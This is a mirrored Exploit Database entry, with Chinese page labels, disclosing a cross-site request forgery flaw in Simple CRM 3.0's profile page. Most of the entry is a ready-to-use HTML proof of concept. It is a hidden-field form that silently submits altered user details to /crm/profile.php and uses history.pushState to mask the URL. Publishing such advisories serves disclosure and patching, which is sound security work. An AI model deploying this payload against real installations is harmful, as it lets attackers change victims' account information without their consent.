Simple CRM 3.0 – ‘Change user information’ Cross-Site Request Forgery (CSRF)

• Exploit Database
• 37 阅读

• 作者： Riadh Benlamine
  日期： 2021-06-21
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50043/

• # Exploit Title: Simple CRM 3.0 - 'Change user information' Cross-Site Request Forgery (CSRF)
  # Date: 20/06/2021
  # Exploit Author: Riadh Benlamine (rbn0x00)
  # Vendor Homepage: https://phpgurukul.com/
  # Software Link: https://phpgurukul.com/small-crm-php/
  # Version: 3.0
  # Category: Webapps
  # Tested on: Apache2+MariaDB latest version
  # Description : Simple CRM suffers from Cross-site request forgery, which the attacker can manipulate user data via triggering user to visit suspicious url
  
  Vulnerable page: /crm/profile.php
  
  POC:
  ----
  <html>
  <body>
  <script>history.pushState('', '', '/')</script>
  <form action="http://localhost/crm/profile.php" method="POST" enctype="multipart/form-data">
  <input type="hidden" name="name" value="test" />
  <input type="hidden" name="alt&#95;email" value="" />
  <input type="hidden" name="phone" value="0123456789" />
  <input type="hidden" name="gender" value="m" />
  <input type="hidden" name="address" value="jgjgjgjjggjcsrf" />
  <input type="hidden" name="update" value="Update" />
  <input type="submit" value="Exploit" />
  </form>
  </body>
  </html>